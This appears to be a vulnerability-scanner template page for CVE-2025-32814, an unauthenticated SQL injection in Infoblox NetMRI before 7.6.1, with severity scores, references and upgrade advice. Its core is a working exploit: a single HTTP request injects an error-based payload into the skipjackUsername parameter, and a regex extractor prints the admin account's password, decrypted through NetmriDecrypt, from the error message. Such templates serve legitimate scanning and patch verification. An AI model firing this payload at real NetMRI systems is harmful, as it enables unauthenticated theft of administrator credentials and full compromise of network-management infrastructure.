NetMRI Unauthenticated SQL Injection via skipjackUsername
CVE-2025-32814
Verified
Description
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
Severity
Critical
CVSS Score
9.8
Exploit Probability
36%
Affected Product
netmri
Published Date
July 7, 2025
Template Author
iamnoooob, pdresearch
CVE-2025-32814.yaml
id: CVE-2025-32814
info:
name: NetMRI Unauthenticated SQL Injection via skipjackUsername
author: iamnoooob,pdresearch
severity: critical
description: |
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
impact: |
Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise.
remediation: |
Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-32814
- https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-32814
cwe-id: CWE-89
epss-score: 0.36412
epss-percentile: 0.98289
cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: infoblox
product: netmri
fofa-query: icon_hash="-319724102"
tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev,vuln
http:
- raw:
- |
GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: password
group: 1
regex:
- "XPATH syntax error: '~(.*?)~'"
internal: true
- type: dsl
dsl:
- "'Password: ' + password"
matchers:
- type: word
part: body
words:
- 'XPATH syntax error:'
# digest: 4a0a0047304502201ba78c029e0730e17b02fa79889f33b4efaeb0267cb88b9799cfbeb755c1f598022100a4f31ff0df9bbe56eb33a908f20027d60672065c72e4b17dc61a2f35b2c42d13:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-32814
CWE ID:
cwe-89
Remediation Steps
Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.